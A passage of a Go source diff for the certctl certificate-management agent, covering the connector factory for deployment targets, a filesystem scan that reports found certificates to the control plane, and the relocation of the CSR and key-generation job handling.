return nil, fmt.Errorf("invalid JavaKeystore config: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return jks.New(&cfg, a.logger), nil
|
||||||
|
|
||||||
|
case "KubernetesSecrets":
|
||||||
|
var cfg k8s.Config
|
||||||
|
if len(configJSON) > 0 {
|
||||||
|
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid KubernetesSecrets config: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return k8s.New(&cfg, a.logger)
|
||||||
|
|
||||||
|
case "AWSACM":
|
||||||
|
// Rank 5 of the 2026-05-03 Infisical deep-research deliverable.
|
||||||
|
// AWS Certificate Manager target — SDK-driven (no file I/O).
|
||||||
|
// LoadDefaultConfig handles the standard AWS credential chain
|
||||||
|
// (IRSA / EC2 instance profile / SSO / env vars) without any
|
||||||
|
// long-lived creds in connector Config.
|
||||||
|
var cfg awsacm.Config
|
||||||
|
if len(configJSON) > 0 {
|
||||||
|
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid AWSACM config: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return awsacm.New(ctx, &cfg, a.logger)
|
||||||
|
|
||||||
|
case "AzureKeyVault":
|
||||||
|
// Rank 5 of the 2026-05-03 Infisical deep-research deliverable.
|
||||||
|
// Azure Key Vault target — SDK-driven (no file I/O).
|
||||||
|
// DefaultAzureCredential handles the standard Azure credential
|
||||||
|
// chain (managed identity / workload identity / env vars / az
|
||||||
|
// CLI fallback). Long-lived service-principal secrets are
|
||||||
|
// supported but discouraged via the credential_mode config.
|
||||||
|
var cfg azurekv.Config
|
||||||
|
if len(configJSON) > 0 {
|
||||||
|
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid AzureKeyVault config: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return azurekv.New(ctx, &cfg, a.logger)
|
||||||
|
|
||||||
|
default:
|
||||||
|
return nil, fmt.Errorf("unsupported target type: %s", targetType)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// splitPEMChain splits a PEM chain into the first certificate (cert) and the rest (chain).
|
||||||
|
// The control plane returns the full chain as a single string with PEM blocks concatenated.
|
||||||
|
func splitPEMChain(pemChain string) (string, string) {
|
||||||
|
data := []byte(pemChain)
|
||||||
|
block, rest := pem.Decode(data)
|
||||||
|
if block == nil {
|
||||||
|
return pemChain, ""
|
||||||
|
}
|
||||||
|
cert := string(pem.EncodeToMemory(block))
|
||||||
|
|
||||||
|
// Skip whitespace between cert and chain
|
||||||
|
chain := strings.TrimSpace(string(rest))
|
||||||
|
if chain == "" {
|
||||||
|
return cert, ""
|
||||||
|
}
|
||||||
|
return cert, chain
|
||||||
|
}
|
||||||
|
|
||||||
|
// fetchCertificate retrieves the certificate PEM chain from the control plane.
|
||||||
|
// GET /api/v1/agents/{agentID}/certificates/{certID}
|
||||||
|
func (a *Agent) fetchCertificate(ctx context.Context, certID string) (string, error) {
|
||||||
|
path := fmt.Sprintf("/api/v1/agents/%s/certificates/%s", a.config.AgentID, certID)
|
||||||
|
resp, err := a.makeRequest(ctx, http.MethodGet, path, nil)
|
||||||
|
if err != nil {
|
||||||
|
return "", fmt.Errorf("request failed: %w", err)
|
||||||
|
}
|
||||||
|
defer resp.Body.Close()
|
||||||
|
|
||||||
|
if resp.StatusCode != http.StatusOK {
|
||||||
|
body, _ := io.ReadAll(resp.Body)
|
||||||
|
return "", fmt.Errorf("server returned %d: %s", resp.StatusCode, string(body))
|
||||||
|
}
|
||||||
|
|
||||||
|
var certResp struct {
|
||||||
|
CertificatePEM string `json:"certificate_pem"`
|
||||||
|
}
|
||||||
|
if err := json.NewDecoder(resp.Body).Decode(&certResp); err != nil {
|
||||||
|
return "", fmt.Errorf("failed to decode response: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
return certResp.CertificatePEM, nil
|
||||||
|
}
|
||||||
@@ -0,0 +1,275 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package main
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"crypto/ecdsa"
|
||||||
|
"crypto/rsa"
|
||||||
|
"crypto/sha256"
|
||||||
|
"crypto/x509"
|
||||||
|
"encoding/pem"
|
||||||
|
"fmt"
|
||||||
|
"io"
|
||||||
|
"net/http"
|
||||||
|
"os"
|
||||||
|
"path/filepath"
|
||||||
|
"strings"
|
||||||
|
"time"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 12 (2026-05-14): extracted from
|
||||||
|
// cmd/agent/main.go via the Option B sibling-file pattern.
|
||||||
|
//
|
||||||
|
// This file holds the filesystem DISCOVERY scan — the agent's
|
||||||
|
// outbound surface for reporting pre-existing certificates it
|
||||||
|
// finds on disk back to the control plane (POST /api/v1/agents/
|
||||||
|
// {id}/discoveries, a machine-to-machine flow NOT exposed via the
|
||||||
|
// MCP surface per the comment in
|
||||||
|
// internal/mcp/tools.go::RegisterTools):
|
||||||
|
//
|
||||||
|
// - runDiscoveryScan: walks each configured discovery directory,
|
||||||
|
// dispatches each candidate file to parsePEMFile or parseDERFile
|
||||||
|
// depending on extension, batches the parsed entries, and POSTs
|
||||||
|
// them in one report.
|
||||||
|
// - parsePEMFile / parseDERFile: extract every X.509 certificate
|
||||||
|
// from a candidate file in either encoding.
|
||||||
|
// - certToEntry: project a parsed *x509.Certificate into the
|
||||||
|
// discoveredCertEntry shape the control plane expects.
|
||||||
|
// - discoveredCertEntry struct + sha256Sum + certKeyInfo helpers
|
||||||
|
// consumed only by the discovery path; co-locating them keeps
|
||||||
|
// this file self-contained.
|
||||||
|
|
||||||
|
// runDiscoveryScan walks configured directories, parses certificate files, and reports
|
||||||
|
// discovered certificates to the control plane.
|
||||||
|
// Supports PEM and DER encoded X.509 certificates.
|
||||||
|
func (a *Agent) runDiscoveryScan(ctx context.Context) {
|
||||||
|
a.logger.Info("starting filesystem certificate discovery scan",
|
||||||
|
"directories", a.config.DiscoveryDirs)
|
||||||
|
|
||||||
|
startTime := time.Now()
|
||||||
|
var certs []discoveredCertEntry
|
||||||
|
var scanErrors []string
|
||||||
|
|
||||||
|
for _, dir := range a.config.DiscoveryDirs {
|
||||||
|
a.logger.Debug("scanning directory", "path", dir)
|
||||||
|
|
||||||
|
err := filepath.Walk(dir, func(path string, info os.FileInfo, err error) error {
|
||||||
|
if err != nil {
|
||||||
|
scanErrors = append(scanErrors, fmt.Sprintf("walk error at %s: %v", path, err))
|
||||||
|
return nil // continue walking
|
||||||
|
}
|
||||||
|
if info.IsDir() {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// Skip files larger than 1MB (unlikely to be a certificate)
|
||||||
|
if info.Size() > 1*1024*1024 {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// Check file extension
|
||||||
|
ext := strings.ToLower(filepath.Ext(path))
|
||||||
|
switch ext {
|
||||||
|
case ".pem", ".crt", ".cer", ".cert":
|
||||||
|
found := a.parsePEMFile(path)
|
||||||
|
certs = append(certs, found...)
|
||||||
|
case ".der":
|
||||||
|
if entry, err := a.parseDERFile(path); err == nil {
|
||||||
|
certs = append(certs, entry)
|
||||||
|
} else {
|
||||||
|
a.logger.Debug("skipping non-cert DER file", "path", path, "error", err)
|
||||||
|
}
|
||||||
|
default:
|
||||||
|
// Try PEM parsing for extensionless files or unknown extensions
|
||||||
|
if ext == "" || ext == ".key" {
|
||||||
|
return nil // skip key files and extensionless
|
||||||
|
}
|
||||||
|
found := a.parsePEMFile(path)
|
||||||
|
if len(found) > 0 {
|
||||||
|
certs = append(certs, found...)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return nil
|
||||||
|
})
|
||||||
|
if err != nil {
|
||||||
|
scanErrors = append(scanErrors, fmt.Sprintf("failed to walk %s: %v", dir, err))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
scanDuration := time.Since(startTime)
|
||||||
|
a.logger.Info("discovery scan completed",
|
||||||
|
"certificates_found", len(certs),
|
||||||
|
"errors", len(scanErrors),
|
||||||
|
"duration_ms", scanDuration.Milliseconds())
|
||||||
|
|
||||||
|
if len(certs) == 0 && len(scanErrors) == 0 {
|
||||||
|
a.logger.Debug("no certificates found and no errors, skipping report")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
// Build report payload
|
||||||
|
entries := make([]map[string]interface{}, len(certs))
|
||||||
|
for i, c := range certs {
|
||||||
|
entries[i] = map[string]interface{}{
|
||||||
|
"fingerprint_sha256": c.FingerprintSHA256,
|
||||||
|
"common_name": c.CommonName,
|
||||||
|
"sans": c.SANs,
|
||||||
|
"serial_number": c.SerialNumber,
|
||||||
|
"issuer_dn": c.IssuerDN,
|
||||||
|
"subject_dn": c.SubjectDN,
|
||||||
|
"not_before": c.NotBefore,
|
||||||
|
"not_after": c.NotAfter,
|
||||||
|
"key_algorithm": c.KeyAlgorithm,
|
||||||
|
"key_size": c.KeySize,
|
||||||
|
"is_ca": c.IsCA,
|
||||||
|
"pem_data": c.PEMData,
|
||||||
|
"source_path": c.SourcePath,
|
||||||
|
"source_format": c.SourceFormat,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
report := map[string]interface{}{
|
||||||
|
"agent_id": a.config.AgentID,
|
||||||
|
"directories": a.config.DiscoveryDirs,
|
||||||
|
"certificates": entries,
|
||||||
|
"errors": scanErrors,
|
||||||
|
"scan_duration_ms": int(scanDuration.Milliseconds()),
|
||||||
|
}
|
||||||
|
|
||||||
|
// Submit to control plane
|
||||||
|
path := fmt.Sprintf("/api/v1/agents/%s/discoveries", a.config.AgentID)
|
||||||
|
resp, err := a.makeRequest(ctx, http.MethodPost, path, report)
|
||||||
|
if err != nil {
|
||||||
|
a.logger.Error("failed to submit discovery report", "error", err)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
defer resp.Body.Close()
|
||||||
|
|
||||||
|
if resp.StatusCode != http.StatusAccepted {
|
||||||
|
body, _ := io.ReadAll(resp.Body)
|
||||||
|
a.logger.Error("discovery report rejected",
|
||||||
|
"status", resp.StatusCode,
|
||||||
|
"body", string(body))
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
a.logger.Info("discovery report submitted successfully",
|
||||||
|
"certificates", len(certs),
|
||||||
|
"errors", len(scanErrors))
|
||||||
|
}
|
||||||
|
|
||||||
|
// discoveredCertEntry holds parsed certificate metadata for reporting.
|
||||||
|
type discoveredCertEntry struct {
|
||||||
|
FingerprintSHA256 string `json:"fingerprint_sha256"`
|
||||||
|
CommonName string `json:"common_name"`
|
||||||
|
SANs []string `json:"sans"`
|
||||||
|
SerialNumber string `json:"serial_number"`
|
||||||
|
IssuerDN string `json:"issuer_dn"`
|
||||||
|
SubjectDN string `json:"subject_dn"`
|
||||||
|
NotBefore string `json:"not_before"`
|
||||||
|
NotAfter string `json:"not_after"`
|
||||||
|
KeyAlgorithm string `json:"key_algorithm"`
|
||||||
|
KeySize int `json:"key_size"`
|
||||||
|
IsCA bool `json:"is_ca"`
|
||||||
|
PEMData string `json:"pem_data"`
|
||||||
|
SourcePath string `json:"source_path"`
|
||||||
|
SourceFormat string `json:"source_format"`
|
||||||
|
}
|
||||||
|
|
||||||
|
// parsePEMFile reads a file and extracts all X.509 certificates from PEM blocks.
|
||||||
|
func (a *Agent) parsePEMFile(path string) []discoveredCertEntry {
|
||||||
|
data, err := os.ReadFile(path)
|
||||||
|
if err != nil {
|
||||||
|
a.logger.Debug("failed to read file", "path", path, "error", err)
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
var entries []discoveredCertEntry
|
||||||
|
rest := data
|
||||||
|
for {
|
||||||
|
var block *pem.Block
|
||||||
|
block, rest = pem.Decode(rest)
|
||||||
|
if block == nil {
|
||||||
|
break
|
||||||
|
}
|
||||||
|
if block.Type != "CERTIFICATE" {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
cert, err := x509.ParseCertificate(block.Bytes)
|
||||||
|
if err != nil {
|
||||||
|
a.logger.Debug("failed to parse certificate in PEM", "path", path, "error", err)
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
|
||||||
|
pemStr := string(pem.EncodeToMemory(block))
|
||||||
|
entries = append(entries, certToEntry(cert, path, "PEM", pemStr))
|
||||||
|
}
|
||||||
|
return entries
|
||||||
|
}
|
||||||
|
|
||||||
|
// parseDERFile reads a DER-encoded certificate file.
|
||||||
|
func (a *Agent) parseDERFile(path string) (discoveredCertEntry, error) {
|
||||||
|
data, err := os.ReadFile(path)
|
||||||
|
if err != nil {
|
||||||
|
return discoveredCertEntry{}, fmt.Errorf("read failed: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
cert, err := x509.ParseCertificate(data)
|
||||||
|
if err != nil {
|
||||||
|
return discoveredCertEntry{}, fmt.Errorf("parse failed: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Convert to PEM for storage
|
||||||
|
pemStr := string(pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE", Bytes: data}))
|
||||||
|
return certToEntry(cert, path, "DER", pemStr), nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// certToEntry converts a parsed x509.Certificate into a discoveredCertEntry.
|
||||||
|
func certToEntry(cert *x509.Certificate, path, format, pemData string) discoveredCertEntry {
|
||||||
|
// Compute SHA-256 fingerprint
|
||||||
|
fingerprint := fmt.Sprintf("%x", sha256Sum(cert.Raw))
|
||||||
|
|
||||||
|
// Determine key algorithm and size
|
||||||
|
keyAlg, keySize := certKeyInfo(cert)
|
||||||
|
|
||||||
|
return discoveredCertEntry{
|
||||||
|
FingerprintSHA256: fingerprint,
|
||||||
|
CommonName: cert.Subject.CommonName,
|
||||||
|
SANs: cert.DNSNames,
|
||||||
|
SerialNumber: cert.SerialNumber.Text(16),
|
||||||
|
IssuerDN: cert.Issuer.String(),
|
||||||
|
SubjectDN: cert.Subject.String(),
|
||||||
|
NotBefore: cert.NotBefore.UTC().Format(time.RFC3339),
|
||||||
|
NotAfter: cert.NotAfter.UTC().Format(time.RFC3339),
|
||||||
|
KeyAlgorithm: keyAlg,
|
||||||
|
KeySize: keySize,
|
||||||
|
IsCA: cert.IsCA,
|
||||||
|
PEMData: pemData,
|
||||||
|
SourcePath: path,
|
||||||
|
SourceFormat: format,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// sha256Sum returns the SHA-256 hash of data.
|
||||||
|
func sha256Sum(data []byte) [32]byte {
|
||||||
|
return sha256.Sum256(data)
|
||||||
|
}
|
||||||
|
|
||||||
|
// certKeyInfo extracts key algorithm name and size from a certificate.
|
||||||
|
func certKeyInfo(cert *x509.Certificate) (string, int) {
|
||||||
|
switch pub := cert.PublicKey.(type) {
|
||||||
|
case *ecdsa.PublicKey:
|
||||||
|
return "ECDSA", pub.Curve.Params().BitSize
|
||||||
|
case *rsa.PublicKey:
|
||||||
|
return "RSA", pub.N.BitLen()
|
||||||
|
default:
|
||||||
|
switch cert.PublicKeyAlgorithm {
|
||||||
|
case x509.Ed25519:
|
||||||
|
return "Ed25519", 256
|
||||||
|
default:
|
||||||
|
return cert.PublicKeyAlgorithm.String(), 0
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
@@ -6,16 +6,9 @@ package main
|
|||||||
import (
|
import (
|
||||||
"bytes"
|
"bytes"
|
||||||
"context"
|
"context"
|
||||||
"crypto/ecdsa"
|
|
||||||
"crypto/elliptic"
|
|
||||||
"crypto/rand"
|
|
||||||
"crypto/rsa"
|
|
||||||
"crypto/sha256"
|
|
||||||
"crypto/tls"
|
"crypto/tls"
|
||||||
"crypto/x509"
|
"crypto/x509"
|
||||||
"crypto/x509/pkix"
|
|
||||||
"encoding/json"
|
"encoding/json"
|
||||||
"encoding/pem"
|
|
||||||
"errors"
|
"errors"
|
||||||
"flag"
|
"flag"
|
||||||
"fmt"
|
"fmt"
|
||||||
@@ -26,29 +19,11 @@ import (
|
|||||||
"net/url"
|
"net/url"
|
||||||
"os"
|
"os"
|
||||||
"os/signal"
|
"os/signal"
|
||||||
"path/filepath"
|
|
||||||
"runtime"
|
"runtime"
|
||||||
"strings"
|
"strings"
|
||||||
"sync"
|
"sync"
|
||||||
"syscall"
|
"syscall"
|
||||||
"time"
|
"time"
|
||||||
|
|
||||||
"github.com/certctl-io/certctl/internal/connector/target"
|
|
||||||
"github.com/certctl-io/certctl/internal/connector/target/apache"
|
|
||||||
"github.com/certctl-io/certctl/internal/connector/target/awsacm"
|
|
||||||
"github.com/certctl-io/certctl/internal/connector/target/azurekv"
|
|
||||||
"github.com/certctl-io/certctl/internal/connector/target/caddy"
|
|
||||||
"github.com/certctl-io/certctl/internal/connector/target/envoy"
|
|
||||||
"github.com/certctl-io/certctl/internal/connector/target/f5"
|
|
||||||
"github.com/certctl-io/certctl/internal/connector/target/haproxy"
|
|
||||||
"github.com/certctl-io/certctl/internal/connector/target/iis"
|
|
||||||
jks "github.com/certctl-io/certctl/internal/connector/target/javakeystore"
|
|
||||||
k8s "github.com/certctl-io/certctl/internal/connector/target/k8ssecret"
|
|
||||||
"github.com/certctl-io/certctl/internal/connector/target/nginx"
|
|
||||||
pf "github.com/certctl-io/certctl/internal/connector/target/postfix"
|
|
||||||
sshconn "github.com/certctl-io/certctl/internal/connector/target/ssh"
|
|
||||||
"github.com/certctl-io/certctl/internal/connector/target/traefik"
|
|
||||||
wcs "github.com/certctl-io/certctl/internal/connector/target/wincertstore"
|
|
||||||
)
|
)
|
||||||
|
|
||||||
// AgentConfig represents the agent-side configuration.
|
// AgentConfig represents the agent-side configuration.
|
||||||
@@ -394,618 +369,6 @@ func (a *Agent) sendHeartbeat(ctx context.Context) {
|
|||||||
a.logger.Debug("heartbeat acknowledged")
|
a.logger.Debug("heartbeat acknowledged")
|
||||||
}
|
}
|
||||||
|
|
||||||
// pollForWork queries the control plane for actionable jobs and processes them.
|
|
||||||
// Jobs may be deployment jobs (Pending) or CSR jobs (AwaitingCSR).
|
|
||||||
// GET /api/v1/agents/{agentID}/work
|
|
||||||
func (a *Agent) pollForWork(ctx context.Context) {
|
|
||||||
a.logger.Debug("polling for work", "agent_id", a.config.AgentID)
|
|
||||||
|
|
||||||
path := fmt.Sprintf("/api/v1/agents/%s/work", a.config.AgentID)
|
|
||||||
resp, err := a.makeRequest(ctx, http.MethodGet, path, nil)
|
|
||||||
if err != nil {
|
|
||||||
a.logger.Error("work poll failed", "error", err)
|
|
||||||
a.consecutiveFailures++
|
|
||||||
return
|
|
||||||
}
|
|
||||||
defer resp.Body.Close()
|
|
||||||
|
|
||||||
// I-004: same terminal-retirement handling as sendHeartbeat. Work-poll is the
|
|
||||||
// other hot path that can observe an agent's soft-retirement; if the
|
|
||||||
// heartbeat tick happens to fire after a work-poll tick within the same
|
|
||||||
// retirement window, this branch catches it first. markRetired's sync.Once
|
|
||||||
// guards idempotency so racing both paths in the same tick only closes the
|
|
||||||
// signal channel once. No consecutiveFailures increment — retirement is
|
|
||||||
// not a transient failure.
|
|
||||||
if resp.StatusCode == http.StatusGone {
|
|
||||||
body, _ := io.ReadAll(resp.Body)
|
|
||||||
a.markRetired("work_poll", resp.StatusCode, string(body))
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
if resp.StatusCode != http.StatusOK {
|
|
||||||
body, _ := io.ReadAll(resp.Body)
|
|
||||||
a.logger.Error("work poll rejected",
|
|
||||||
"status", resp.StatusCode,
|
|
||||||
"body", string(body))
|
|
||||||
a.consecutiveFailures++
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
var workResp WorkResponse
|
|
||||||
if err := json.NewDecoder(resp.Body).Decode(&workResp); err != nil {
|
|
||||||
a.logger.Error("failed to decode work response", "error", err)
|
|
||||||
a.consecutiveFailures++
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
a.consecutiveFailures = 0
|
|
||||||
|
|
||||||
if workResp.Count == 0 {
|
|
||||||
a.logger.Debug("no pending work")
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
a.logger.Info("received work", "job_count", workResp.Count)
|
|
||||||
|
|
||||||
// Process each job based on type and status
|
|
||||||
for _, job := range workResp.Jobs {
|
|
||||||
switch {
|
|
||||||
case job.Status == "AwaitingCSR":
|
|
||||||
// Agent keygen mode: generate key locally, create CSR, submit to server
|
|
||||||
a.executeCSRJob(ctx, job)
|
|
||||||
case job.Type == "Deployment":
|
|
||||||
a.executeDeploymentJob(ctx, job)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
// executeCSRJob handles an AwaitingCSR job: generates a private key locally, creates a CSR,
|
|
||||||
// and submits it to the control plane for signing. The private key is stored on the local
|
|
||||||
// filesystem with 0600 permissions and NEVER sent to the server.
|
|
||||||
//
|
|
||||||
// Flow:
|
|
||||||
// 1. Generate ECDSA P-256 key pair
|
|
||||||
// 2. Store private key to disk (keyDir/certID.key) with 0600 permissions
|
|
||||||
// 3. Create CSR with common name and SANs from work response
|
|
||||||
// 4. Submit CSR to control plane via POST /agents/{id}/csr
|
|
||||||
// 5. Server signs the CSR and creates a cert version + deployment jobs
|
|
||||||
func (a *Agent) executeCSRJob(ctx context.Context, job JobItem) {
|
|
||||||
a.logger.Info("executing CSR job (agent-side key generation)",
|
|
||||||
"job_id", job.ID,
|
|
||||||
"certificate_id", job.CertificateID,
|
|
||||||
"common_name", job.CommonName)
|
|
||||||
|
|
||||||
// Step 1: Generate ECDSA P-256 key pair
|
|
||||||
privKey, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
|
|
||||||
if err != nil {
|
|
||||||
a.logger.Error("failed to generate private key",
|
|
||||||
"job_id", job.ID,
|
|
||||||
"error", err)
|
|
||||||
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("key generation failed: %v", err)); reportErr != nil {
|
|
||||||
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
|
||||||
}
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
a.logger.Info("generated ECDSA P-256 key pair locally",
|
|
||||||
"job_id", job.ID,
|
|
||||||
"certificate_id", job.CertificateID)
|
|
||||||
|
|
||||||
// Step 2: Store private key to disk with secure permissions.
|
|
||||||
//
|
|
||||||
// Bundle-9 / Audit L-002 + L-003: marshal+write through helpers that
|
|
||||||
// (a) zeroize the in-heap DER buffer immediately after the PEM block is
|
|
||||||
// constructed so the private scalar's exposure window is bounded by
|
|
||||||
// this function call, and (b) assert the key directory is mode 0700
|
|
||||||
// before any write touches disk. Also defer-clear the PEM buffer for
|
|
||||||
// the same reason — the encoded key isn't sensitive in transit (it's
|
|
||||||
// going to disk) but lingers on the heap if we don't.
|
|
||||||
keyPath := filepath.Join(a.config.KeyDir, job.CertificateID+".key")
|
|
||||||
if err := ensureAgentKeyDirSecure(filepath.Dir(keyPath)); err != nil {
|
|
||||||
a.logger.Error("agent key dir hardening failed", "job_id", job.ID, "error", err)
|
|
||||||
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("key dir hardening failed: %v", err)); reportErr != nil {
|
|
||||||
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
|
||||||
}
|
|
||||||
return
|
|
||||||
}
|
|
||||||
var privKeyPEM []byte
|
|
||||||
if marshalErr := marshalAgentKeyAndZeroize(privKey, func(der []byte) error {
|
|
||||||
privKeyPEM = pem.EncodeToMemory(&pem.Block{
|
|
||||||
Type: "EC PRIVATE KEY",
|
|
||||||
Bytes: der,
|
|
||||||
})
|
|
||||||
return nil
|
|
||||||
}); marshalErr != nil {
|
|
||||||
a.logger.Error("failed to marshal private key",
|
|
||||||
"job_id", job.ID,
|
|
||||||
"error", marshalErr)
|
|
||||||
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("key marshal failed: %v", marshalErr)); reportErr != nil {
|
|
||||||
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
|
||||||
}
|
|
||||||
return
|
|
||||||
}
|
|
||||||
defer clear(privKeyPEM)
|
|
||||||
|
|
||||||
if err := os.WriteFile(keyPath, privKeyPEM, 0600); err != nil {
|
|
||||||
a.logger.Error("failed to write private key to disk",
|
|
||||||
"job_id", job.ID,
|
|
||||||
"key_path", keyPath,
|
|
||||||
"error", err)
|
|
||||||
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("key storage failed: %v", err)); reportErr != nil {
|
|
||||||
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
|
||||||
}
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
a.logger.Info("private key stored securely",
|
|
||||||
"job_id", job.ID,
|
|
||||||
"key_path", keyPath,
|
|
||||||
"permissions", "0600")
|
|
||||||
|
|
||||||
// Validate common name is present
|
|
||||||
if job.CommonName == "" {
|
|
||||||
a.logger.Error("empty common name in CSR job", "job_id", job.ID)
|
|
||||||
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", "empty common name"); reportErr != nil {
|
|
||||||
a.logger.Error("failed to report job status to server", "job_id", job.ID, "error", reportErr)
|
|
||||||
}
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
// Step 3: Create CSR with common name and SANs
|
|
||||||
// Split SANs into DNS names and email addresses for proper CSR encoding
|
|
||||||
var dnsNames []string
|
|
||||||
var emailAddresses []string
|
|
||||||
for _, san := range job.SANs {
|
|
||||||
if strings.Contains(san, "@") {
|
|
||||||
emailAddresses = append(emailAddresses, san)
|
|
||||||
} else {
|
|
||||||
dnsNames = append(dnsNames, san)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
csrTemplate := &x509.CertificateRequest{
|
|
||||||
Subject: pkix.Name{
|
|
||||||
CommonName: job.CommonName,
|
|
||||||
},
|
|
||||||
DNSNames: dnsNames,
|
|
||||||
EmailAddresses: emailAddresses,
|
|
||||||
}
|
|
||||||
|
|
||||||
csrDER, err := x509.CreateCertificateRequest(rand.Reader, csrTemplate, privKey)
|
|
||||||
if err != nil {
|
|
||||||
a.logger.Error("failed to create CSR",
|
|
||||||
"job_id", job.ID,
|
|
||||||
"error", err)
|
|
||||||
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("CSR creation failed: %v", err)); reportErr != nil {
|
|
||||||
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
|
||||||
}
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
csrPEM := string(pem.EncodeToMemory(&pem.Block{
|
|
||||||
Type: "CERTIFICATE REQUEST",
|
|
||||||
Bytes: csrDER,
|
|
||||||
}))
|
|
||||||
|
|
||||||
// Step 4: Submit CSR to the control plane (only the public key leaves the agent)
|
|
||||||
a.logger.Info("submitting CSR to control plane",
|
|
||||||
"job_id", job.ID,
|
|
||||||
"certificate_id", job.CertificateID)
|
|
||||||
|
|
||||||
submitPath := fmt.Sprintf("/api/v1/agents/%s/csr", a.config.AgentID)
|
|
||||||
resp, err := a.makeRequest(ctx, http.MethodPost, submitPath, map[string]string{
|
|
||||||
"csr_pem": csrPEM,
|
|
||||||
"certificate_id": job.CertificateID,
|
|
||||||
})
|
|
||||||
if err != nil {
|
|
||||||
a.logger.Error("failed to submit CSR",
|
|
||||||
"job_id", job.ID,
|
|
||||||
"error", err)
|
|
||||||
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("CSR submission failed: %v", err)); reportErr != nil {
|
|
||||||
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
|
||||||
}
|
|
||||||
return
|
|
||||||
}
|
|
||||||
defer resp.Body.Close()
|
|
||||||
|
|
||||||
if resp.StatusCode != http.StatusAccepted {
|
|
||||||
body, _ := io.ReadAll(resp.Body)
|
|
||||||
a.logger.Error("CSR submission rejected",
|
|
||||||
"job_id", job.ID,
|
|
||||||
"status", resp.StatusCode,
|
|
||||||
"body", string(body))
|
|
||||||
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("CSR rejected: %s", string(body))); reportErr != nil {
|
|
||||||
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
|
||||||
}
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
a.logger.Info("CSR submitted and signed successfully",
|
|
||||||
"job_id", job.ID,
|
|
||||||
"certificate_id", job.CertificateID,
|
|
||||||
"key_path", keyPath)
|
|
||||||
}
|
|
||||||
|
|
||||||
// executeDeploymentJob executes a deployment job by fetching the certificate and deploying it
|
|
||||||
// to the target system using the appropriate connector (NGINX, F5 BIG-IP, or IIS).
|
|
||||||
//
|
|
||||||
// For agent keygen mode, the private key is read from the local key store (keyDir/certID.key)
|
|
||||||
// rather than fetched from the server. The deployment includes the locally-held key.
|
|
||||||
//
|
|
||||||
// Flow:
|
|
||||||
// 1. Report job as Running
|
|
||||||
// 2. Fetch the certificate PEM from the control plane
|
|
||||||
// 3. Load local private key if it exists (agent keygen mode)
|
|
||||||
// 4. Instantiate the target connector based on target_type from the work response
|
|
||||||
// 5. Call DeployCertificate on the connector
|
|
||||||
// 6. Report job as Completed (or Failed)
|
|
||||||
